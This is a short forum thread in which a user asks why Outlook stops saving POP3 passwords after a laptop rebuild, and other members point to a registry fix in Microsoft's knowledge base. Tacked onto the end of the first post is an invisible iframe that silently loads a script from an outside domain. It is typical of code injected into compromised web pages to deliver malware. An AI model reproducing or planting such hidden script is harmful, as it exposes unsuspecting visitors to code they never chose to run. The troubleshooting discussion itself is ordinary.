Strange Outlook Problem

I know this has nothing to do with pdaPhones... but it has to do with me responding to email requests on the site. I recently had to rebuild my laptop and ever since I've reinstalled Outlook, it has a strange behavior. It refused to retain any passwords.

I enter them for my POP3 accounts and check the box that says save them. All is fine. Then after a reboot, the passwords are gone. I get the prompts to enter them, and entering them in the popup dialogs doesn't work. I am forced to go back into >Tools>E-MailAccounts to enter them again. When I go in there, I see that the "save password" box is still checked, but the password field is empty. I used to see the "******" in the field, which is what's there after I enter them.

Anyone had this happen before... it's driving me crazy as I have a laptop and its on and off constantly all day. Thanks.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Yeah its a "known" issue with outlook.

There is an identity registery key you have to hack to fix it.

Search Microsoft's Knowledge base for outlook remember password and you should find the solution.

Here's the link to the answer

I'm in the midst of testing this... I think this is the URL for the answer Vikes98 referred to.
